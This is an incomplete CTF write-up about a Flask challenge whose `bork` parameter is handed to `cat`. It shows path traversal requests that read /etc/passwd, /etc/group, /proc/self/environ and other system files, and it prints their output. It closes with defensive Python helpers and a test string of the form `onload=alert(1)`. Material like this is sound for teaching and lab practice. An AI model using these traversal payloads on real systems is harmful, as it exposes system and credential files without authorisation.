Version

| By | Version | Comment |
| --- | --- | --- |
| noraj | 1.0 | Creation |
CTF
Description
UPDATE: We have made changes to this challenge to make it (somewhat) stable. If what you were trying before is not working, it's because it was causing a problem for us on the back end. I assure you that what you were doing was not the easiest solution, anyway.
We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.
https://ctf.rc3.club:3100/
author:orkulus
Solution
TL;DR: warning, this is an incomplete writeup; we didn't solve this challenge.
We can see the server is neither Apache nor nginx: `Server: Werkzeug/0.11.11 Python/2.7.12` (Werkzeug is the Python WSGI toolkit and development server used by Flask).
The dropdown menu is used to select a file (`something.txt`). The server uses `cat` to read it and writes its content into the `src` attribute of a video tag.
So we will try to disclose some system files into this `src` with the `bork` POST parameter.
So let's see the behaviour with `bork=test.txt`:

```html
<iframe width="854" height="480" src="cat: borks/test.txt: No such file or directory?autoplay=1&loop=1" frameborder="0"></iframe>
```

The `cat` error message lands in the attribute, so the file is read as `borks/<bork>` and stderr is captured along with stdout.
With `bork=../../../../../etc/passwd`:

```html
<iframe width="854" height="480" src="root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ctfuser:x:1001:1001::/home/ctfuser:?autoplay=1&loop=1" frameborder="0"></iframe>
```
With `bork=../../../../../proc/self/environ`:

```text
/LESSOPEN=|%20/usr/bin/lesspipe%20%s%EF%BF%BDPYTHONIOENCODING=UTF-8%EF%BF%BDTMUX=/tmp/tmux-1000/default,2791,1%EF%BF%BDMAIL=/var/mail/ctfuser%EF%BF%BDSSH_CLIENT=192.168.0.104%2038572%2022%EF%BF%BDUSER=ctfuser%EF%BF%BDSHLVL=4%EF%BF%BDHOME=/home/ctfuser%EF%BF%BDSSH_TTY=/dev/pts/4%EF%BF%BDLOGNAME=ctfuser%EF%BF%BDEVENT_NOEPOLL=1%EF%BF%BD_=/usr/bin/python%EF%BF%BDXDG_SESSION_ID=9%EF%BF%BDTERM=screen-256color%EF%BF%BDPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games%EF%BF%BDXDG_RUNTIME_DIR=/run/user/1000%EF%BF%BDLANG=en_US.UTF-8%EF%BF%BDLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:%EF%BF%BDSHELL=/bin/bash%EF%BF%BDLESSCLOSE=/usr/bin/lesspipe%20%s%20%s%EF%BF%BDPWD=/home/ctfuser/Web-300/app%EF%BF%BDSSH_CONNECTION=192.168.0.104%2057282%20192.168.30.121%2022%EF%BF%BDTMUX_PANE=%4%EF%BF%BD
```

After URL-decoding (each `%EF%BF%BD` is the U+FFFD replacement character, standing in for the NUL byte that separates entries in `/proc/self/environ`):

```text
/LESSOPEN=| /usr/bin/lesspipe %s�PYTHONIOENCODING=UTF-8�TMUX=/tmp/tmux-1000/default,2791,1�MAIL=/var/mail/ctfuser�SSH_CLIENT=192.168.0.104 38572 22�USER=ctfuser�SHLVL=4�HOME=/home/ctfuser�SSH_TTY=/dev/pts/4�LOGNAME=ctfuser�EVENT_NOEPOLL=1�_=/usr/bin/python�XDG_SESSION_ID=9�TERM=screen-256color�PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games�XDG_RUNTIME_DIR=/run/user/1000�LANG=en_US.UTF-8�LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:�SHELL=/bin/bash�LESSCLOSE=/usr/bin/lesspipe %s %s�PWD=/home/ctfuser/Web-300/app�SSH_CONNECTION=192.168.0.104 57282 192.168.30.121 22�TMUX_PANE=%4�
```
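Reading that dump by eye is painful, so here is a small decoder and triage helper, added as an example (it is not part of the original writeup). It percent-decodes the dump, splits entries on either a raw NUL or the U+FFFD that replaced it, and summarises what the leak tells a defender: which user the process runs as, where the application lives, whether it was launched from an interactive SSH/tmux session rather than a service manager, and whether any `HTTP_*` variables are present. `SAMPLE` is a constructed excerpt of the dump above; the leading `/` on the first key is taken to be an artefact of the page and is stripped, which is an assumption.

```python
"""Decode and triage a leaked /proc/self/environ dump (illustrative code,
not the challenge's own)."""
import re
from urllib.parse import unquote

# Constructed excerpt of the percent-encoded dump shown on the page.
SAMPLE = (
    "/LESSOPEN=|%20/usr/bin/lesspipe%20%s%EF%BF%BD"
    "SSH_CLIENT=192.168.0.104%2038572%2022%EF%BF%BD"
    "USER=ctfuser%EF%BF%BD"
    "HOME=/home/ctfuser%EF%BF%BD"
    "_=/usr/bin/python%EF%BF%BD"
    "PWD=/home/ctfuser/Web-300/app%EF%BF%BD"
)

# /proc/<pid>/environ separates entries with NUL; the page rendered each NUL as
# U+FFFD (%EF%BF%BD), so both separators are accepted.
_SEPARATOR = re.compile("[\x00\ufffd]")


def parse_environ_dump(encoded):
    """Return the leaked environment as a dict of NAME -> value.

    Invalid percent sequences such as '%s' survive unquote() unchanged, which is
    what we want for LESSOPEN/LESSCLOSE. Chunks without '=' (including the empty
    one after the trailing separator) are skipped.
    """
    env = {}
    for chunk in _SEPARATOR.split(unquote(encoded)):
        if "=" not in chunk:
            continue
        key, _, value = chunk.partition("=")
        # Assumption: the leading '/' on the first key is page debris, not part of the name.
        env[key.lstrip("/")] = value
    return env


def triage(env):
    """Summarise the security-relevant facts a defender would pull from the leak."""
    return {
        # Identity the web process runs as (here an interactive login user, not a service account).
        "user": env.get("USER"),
        # Working directory reveals where the application code is deployed.
        "app_dir": env.get("PWD"),
        # SSH/tmux variables mean the server was started by hand inside a login session.
        "interactive_session": any(k in env for k in ("SSH_CLIENT", "SSH_TTY", "TMUX")),
        # CGI-style HTTP_* variables would mean request headers are copied into the
        # process environment; a WSGI server keeps them in its own environ dict instead.
        "http_vars": sorted(k for k in env if k.startswith("HTTP_")),
    }


if __name__ == "__main__":
    leaked = parse_environ_dump(SAMPLE)
    for name in sorted(leaked):
        print("%s=%s" % (name, leaked[name]))
    print(triage(leaked))
```

Run it on the full dump from the page by pasting the encoded text into `SAMPLE`; the `http_vars` list coming back empty is exactly the observation made at the end of this writeup about `HTTP_USER_AGENT`.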
With `bork=../../../../../etc/group`:

```text
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,ubuntu
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:ubuntu
fax:x:21:
voice:x:22:
cdrom:x:24:ubuntu
floppy:x:25:ubuntu
tape:x:26:
sudo:x:27:ubuntu
audio:x:29:ubuntu
dip:x:30:ubuntu
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:ubuntu
sasl:x:45:
plugdev:x:46:ubuntu
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
netdev:x:109:ubuntu
lxd:x:110:ubuntu
messagebus:x:111:
uuidd:x:112:
mlocate:x:113:
ssh:x:114:
admin:x:115:
ubuntu:x:1000:
docker:x:116:ubuntu
ctfuser:x:1001:
```
`bork=../../../../../etc/issue` : `Ubuntu 16.04.1 LTS \n \l`
`bork=../../../../../proc/version` : `Linux version 4.4.0-47-generic (buildd@lcy01-03) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) ) #68-Ubuntu SMP Wed Oct 26 19:39:52 UTC 2016`
`bork=../../../../../etc/profile` :

```sh
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

if [ "$PS1" ]; then
    if [ "$BASH" ] && [ "$BASH" != "/bin/sh" ]; then
        # The file bash.bashrc already sets the default PS1.
        # PS1='\h:\w\$ '
        if [ -f /etc/bash.bashrc ]; then
            . /etc/bash.bashrc
        fi
    else
        if [ "`id -u`" -eq 0 ]; then
            PS1='# '
        else
            PS1='$ '
        fi
    fi
fi

if [ -d /etc/profile.d ]; then
    for i in /etc/profile.d/*.sh; do
        if [ -r $i ]; then
            . $i
        fi
    done
    unset i
fi
```
`bork=../../../../../root/.bash_history` : youtube video
`bork=../../../../../var/log/dmessage` : No such file or directory
`bork=../../../../../var/mail/root` : No such file or directory
`bork=../../../../../var/spool/cron/crontabs/root` : Permission denied
`bork=../../../../../home/ctfuser/flag.txt` : No such file or directory
`bork=../../../../../home/ctfuser/Web-300/app/.htaccess` : youtube video
`bork=../../../../../home/ctfuser/Web-300/app/flag.txt` : youtube video
`bork=../../../../../usr/bin/lesspipe` :

```sh
#!/bin/sh
#
# lessfile/lesspipe
# $Id: lessopen,v 1.4 1998/05/12 09:37:46 torin Exp $
# Plus POSIX sh changes by Y.Dirson
#
# Less filter for viewing non text files.
#
# Written by: Behan Webster <behanw@pobox.com>
# Many Modifications by Darren Stalder
# Further Modifications by Thomas Schoepf <schoepf@debian.org>
#
# combined lessfile and lesspipe to avoid duplication of decode stage
# shell is sure icky. I'm real tempted to rewrite the whole thing in Perl
#
# Unfortunately, this means that I have filename dependencies sprinkled
# throughout the code. If you don't want lessfile to be called that,
# you'll need to change the LESSFILE envar below.
#
# Usage: eval `lessfile` or eval `lesspipe`
#
# less passes in:
#    $1 filename to be viewed with less (used by LESSOPEN)
#  and possibly (if used by lessfile)
#    $2 filename that was created during LESSOPEN

TMPDIR=${TMPDIR:-/tmp}
BASENAME=`basename $0`
LESSFILE=lessfile

# Helper function to list contents of ISO files (CD images)
iso_list() {
    isoinfo -d -i "$1"
    isoinfo -d -i "$1" | grep -q ^Rock\.Ridge && iiopts="$iiopts -R"
    isoinfo -d -i "$1" | grep -q ^Joliet && iiopts="$iiopts -J"
    echo
    isoinfo -f $iiopts -i "$1"
}

if [ $# -eq 1 ] ; then
    # we were called as LESSOPEN

    # if the file doesn't exist, we don't do anything
    if [ ! -r "$1" ]; then
        exit 0
    fi

    # generate filename for possible use by lesspipe
    umask 077
    if [ $BASENAME = $LESSFILE ]; then
        TMPFILE=`tempfile -d $TMPDIR -p lessf`
        if [ -z "$TMPFILE" ]; then
            echo >&2 "Could not find essential program 'tempfile'. Exiting"
            exit 1
        fi
    fi

    (
        # possibly redirect stdout to a file for lessfile
        if [ $BASENAME = $LESSFILE ]; then exec > $TMPFILE; fi

        # Allow for user defined filters
        #if [ -x ~/.lessfilter -a -O ~/.lessfilter ]; then
        if [ -x ~/.lessfilter ]; then
            ~/.lessfilter "$1"
            if [ $? -eq 0 ]; then
                if [ $BASENAME = $LESSFILE ]; then
                    if [ -s $TMPFILE ]; then
                        echo $TMPFILE
                    else
                        rm -f $TMPFILE
                    fi
                fi
                exit 0
            fi
        fi

        # Decode file for less
        case `echo "$1" | tr '[:upper:]' '[:lower:]'` in
            *.a)
                if [ -x "`which ar`" ]; then ar tv "$1"
                else echo "No ar available"; fi ;;
            *.arj)
                if [ -x "`which unarj`" ]; then unarj l "$1"
                else echo "No unarj available"; fi ;;
            *.tar.bz2)
                if [ -x "`which bunzip2`" ]; then
                    bunzip2 -dc "$1" | tar tvvf -
                else echo "No bunzip2 available"; fi ;;
            *.bz)
                if [ -x "`which bunzip`" ]; then bunzip -c "$1"
                else echo "No bunzip available"; fi ;;
            *.bz2)
                if [ -x "`which bunzip2`" ]; then bunzip2 -dc "$1"
                else echo "No bunzip2 available"; fi ;;
            *.deb|*.udeb|*.ddeb|*.ipk)
                echo "$1:"; dpkg --info "$1"
                echo
                echo '*** Contents:'; dpkg-deb --contents "$1"
                ;;
            *.doc)
                if [ -x "`which catdoc`" ]; then
                    catdoc "$1"
                else
                    # no catdoc, read normally if file is text.
                    if ( file "$1" | grep ASCII 2>/dev/null >/dev/null); then
                        cat "$1"
                    else
                        echo "No catdoc available";
                    fi
                fi
                ;;
            *.gif|*.jpeg|*.jpg|*.pcd|*.png|*.tga|*.tiff|*.tif)
                if [ -x "`which identify`" ]; then
                    identify "$1"
                else
                    echo "No identify available"
                    echo "Install ImageMagick to browse images"
                fi
                ;;
            *.iso)
                if [ -x "`which isoinfo`" ]; then iso_list "$1"
                else
                    echo "No isoinfo available"
                    echo "Install mkisofs to view ISO images"
                fi
                ;;
            *.bin|*.raw)
                if [ -x "`which isoinfo`" ]; then
                    file "$1" | grep -q ISO\.9660 && iso_list "$1"
                else
                    echo "No isoinfo available"
                    echo "Install mkisofs to view ISO images"
                fi
                ;;
            *.lha|*.lzh)
                if [ -x "`which lha`" ]; then lha v "$1"
                else echo "No lha available"; fi ;;
            *.tar.lz|*.tlz)
                if [ -x "`which lzip`" ]; then
                    lzip -dc "$1" | tar tvvf -
                elif [ -x "`which lunzip`" ]; then
                    lunzip -dc "$1" | tar tvvf -
                else echo "No lzip or lunzip available"; fi ;;
            *.lz)
                if [ -x "`which lzip`" ]; then lzip -dc "$1"
                elif [ -x "`which lunzip`" ]; then lunzip -dc "$1"
                else echo "No lzip or lunzip available"; fi ;;
            *.tar.lzma)
                if [ -x "`which lzma`" ]; then
                    lzma -dc "$1" | tar tfvv -
                else
                    echo "No lzma available"
                fi
                ;;
            *.lzma)
                if [ -x "`which lzma`" ]; then
                    lzma -dc "$1"
                else
                    echo "No lzma available"
                fi
                ;;
            *.pdf)
                if [ -x "`which pdftotext`" ]; then pdftotext -layout "$1" -
                else echo "No pdftotext available"; fi ;;
            *.rar|*.r[0-9][0-9])
                if [ -x "`which rar`" ]; then rar v "$1"
                elif [ -x "`which unrar`" ]; then unrar v "$1"
                else echo "No rar or unrar available"; fi ;;
            *.rpm)
                if [ -x "`which rpm`" ]; then
                    echo "$1:"; rpm -q -i -p "$1"
                    echo
                    echo '*** Contents:'
                    rpm -q -l -p "$1"
                else echo "rpm isn't available, no query on rpm package possible"; fi ;;
            *.tar.gz|*.tgz|*.tar.z|*.tar.dz)
                tar tzvf "$1" --force-local
                ;;
            *.tar.xz|*.txz)
                if [ -x "`which xz`" ]; then
                    xz -dc "$1" | tar tfvv -
                else
                    echo "No xz available"
                fi
                ;;
            *.xz)
                if [ -x "`which xz`" ]; then
                    xz -dc "$1"
                else
                    echo "No xz available"
                fi
                ;;
            # Note that this is out of alpha order so that we don't catch
            # the gzipped tar files.
            *.gz|*.z|*.dz)
                gzip -dc "$1" ;;
            *.tar)
                tar tvf "$1" --force-local
                ;;
            *.jar|*.war|*.ear|*.xpi|*.zip)
                if [ -x "`which unzip`" ]; then unzip -v "$1";
                elif [ -x "`which miniunzip`" ]; then miniunzip -l "$1";
                elif [ -x "`which miniunz`" ]; then miniunz -l "$1";
                else echo "No unzip, miniunzip or miniunz available"; fi ;;
            *.7z)
                if [ -x "`which 7za`" ]; then 7za l "$1";
                elif [ -x "`which 7zr`" ]; then 7zr l "$1";
                else echo "No 7za or 7zr available"; fi ;;
            *.zoo)
                if [ -x "`which zoo`" ]; then zoo v "$1";
                elif [ -x "`which unzoo`" ]; then unzoo -l "$1";
                else echo "No unzoo or zoo available"; fi ;;
        esac
    ) 2>/dev/null

    if [ $BASENAME = $LESSFILE ]; then
        if [ -s $TMPFILE ]; then
            echo $TMPFILE
        else
            rm -f $TMPFILE
        fi
    fi

elif [ $# -eq 2 ] ; then
    #
    # we were called as LESSCLOSE
    # delete the file created if we were lessfile
    #
    if [ $BASENAME = $LESSFILE ]; then
        if [ -n "$BASH" ]; then
            if [ ! -O "$2" ]; then
                echo "Error in deleting $2" > /dev/tty
            fi
        fi
        if [ -f "$2" ]; then
            rm -f "$2"
        else
            echo "Error in deleting $2" > /dev/tty
        fi
    fi

elif [ $# -eq 0 ] ; then
    #
    # must setup shell to use LESSOPEN/LESSCLOSE
    #
    # I have no idea how some of the more esoteric shells (es, rc) do
    # things. If they don't do things in a Bourne manner, send me a patch
    # and I'll incorporate it.
    #

    # first determine the full path of lessfile/lesspipe
    # if you can determine a better way to do this, send me a patch, I've
    # not shell-scripted for many a year.
    FULLPATH=`cd \`dirname $0\`;pwd`/$BASENAME

    case "$SHELL" in
        *csh)
            if [ $BASENAME = $LESSFILE ]; then
                echo "setenv LESSOPEN \"$FULLPATH %s\";"
                echo "setenv LESSCLOSE \"$FULLPATH %s %s\";"
            else
                echo "setenv LESSOPEN \"| $FULLPATH %s\";"
                echo "setenv LESSCLOSE \"$FULLPATH %s %s\";"
            fi
            ;;
        *)
            if [ $BASENAME = $LESSFILE ]; then
                echo "export LESSOPEN=\"$FULLPATH %s\";"
                echo "export LESSCLOSE=\"$FULLPATH %s %s\";"
            else
                echo "export LESSOPEN=\"| $FULLPATH %s\";"
                echo "export LESSCLOSE=\"$FULLPATH %s %s\";"
            fi
            ;;
    esac
    #echo "# If you tried to view a file with a name that starts with '#', you"
    #echo "# might see this message instead of the file's contents."
    #echo "# To view the contents, try to put './' ahead of the filename when"
    #echo "# calling less."
else
    echo "Usage: eval \`$BASENAME\`"
    exit
fi
```
`bork=../../../../../tmp/tmux-1000/default` : youtube video
`bork=../../../../../var/mail/ctfuser` : No such file or directory
`bork=../../../../../dev/pts/4` : Permission denied
`bork=../../../../../home/ctfuser/Web-300/app/bork.py` : youtube video
We thought that a logical way to solve the challenge was to display `/etc/passwd` and then some file inside one of the listed home directories, like `flag.txt`, or to inject commands like `ls`, but that didn't work.
Another way we thought of was to leak `/proc/self/environ` and then inject some code through the User-Agent header, but there was no `HTTP_USER_AGENT` environment variable.
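The mechanism described at the start of the solution (the `bork` parameter appended to `borks/` and handed to `cat`) and the two observations just above (traversal works, `ls` injection does not) are both illustrated by the following example. It is added here and is not the challenge's `bork.py`, which was never recovered; the Flask plumbing is replaced by plain functions and the `borks/` layout is an assumption. The point for a defender: building the argv as a list (`["cat", "borks/" + name]`) keeps shell metacharacters inert, which is consistent with `ls` injection failing, but does nothing against `../`; the hardened lookup resolves the path with `os.path.realpath` and refuses anything that leaves the `borks/` directory (symlinks included), reads the file in Python instead of shelling out, and HTML-escapes the content before it reaches the `src` attribute.

```python
"""Vulnerable vs. hardened file lookup for a 'pick a bork' endpoint
(illustrative code, not the challenge's own bork.py)."""
import html
import os
import tempfile


def unsafe_command(name):
    """The pattern inferred from the page: one argv element, no shell.

    '; ls' stays inside the single filename argument (so no command injection),
    but '../' segments are still honoured by the kernel when cat opens the path.
    """
    return ["cat", "borks/" + name]


def unsafe_bork_path(base_dir, name):
    """Path as the vulnerable code would build it: blind concatenation."""
    return os.path.join(base_dir, "borks", name)


def safe_bork_path(base_dir, name):
    """Hardened lookup: resolve symlinks and '..' first, then require the result
    to still sit inside borks/ and to be a regular .txt file."""
    borks = os.path.realpath(os.path.join(base_dir, "borks"))
    candidate = os.path.realpath(os.path.join(borks, name))
    if os.path.commonpath([borks, candidate]) != borks:
        raise ValueError("path traversal rejected: %r" % name)
    if not candidate.endswith(".txt") or not os.path.isfile(candidate):
        raise ValueError("not a selectable bork file: %r" % name)
    return candidate


def read_bork(path):
    """Read in-process instead of via cat: no subprocess, and an open() error
    raises rather than leaking 'cat: ...: No such file' text into the page."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def render_iframe(content):
    """Escape before interpolating into an attribute; the page's iframe dumped
    raw file bytes straight into src="...", which is also an HTML injection sink."""
    return '<iframe src="%s"></iframe>' % html.escape(content, quote=True)


def demo():
    """Build a throwaway borks/ directory (all files constructed here) and run
    both lookups on a benign name, on the traversal payload from the writeup and
    on a symlink that points outside borks/."""
    base = tempfile.mkdtemp()
    borks = os.path.join(base, "borks")
    os.makedirs(borks)
    with open(os.path.join(borks, "gabe.txt"), "w") as fh:
        fh.write("https://example.invalid/gabe.mp4")
    results = {
        "unsafe_benign": unsafe_bork_path(base, "gabe.txt"),
        "unsafe_traversal": unsafe_bork_path(base, "../../../../../etc/passwd"),
        "safe_benign": read_bork(safe_bork_path(base, "gabe.txt")),
    }
    try:
        safe_bork_path(base, "../../../../../etc/passwd")
        results["safe_traversal"] = "accepted"
    except ValueError:
        results["safe_traversal"] = "rejected"
    # Symlink escape: the name looks fine but realpath() leaves borks/.
    try:
        os.symlink("/etc/hostname", os.path.join(borks, "link.txt"))
    except OSError:
        results["safe_symlink"] = "skipped"  # platform without symlink support
    else:
        try:
            safe_bork_path(base, "link.txt")
            results["safe_symlink"] = "accepted"
        except ValueError:
            results["safe_symlink"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-18s %s" % (key, value))
    print(render_iframe('x" onload="alert(1)'))
```

`os.path.commonpath` is used rather than a `startswith` check on purpose: `startswith("/srv/borks")` would also accept `/srv/borks-private/secret.txt`, whereas `commonpath` compares whole path components.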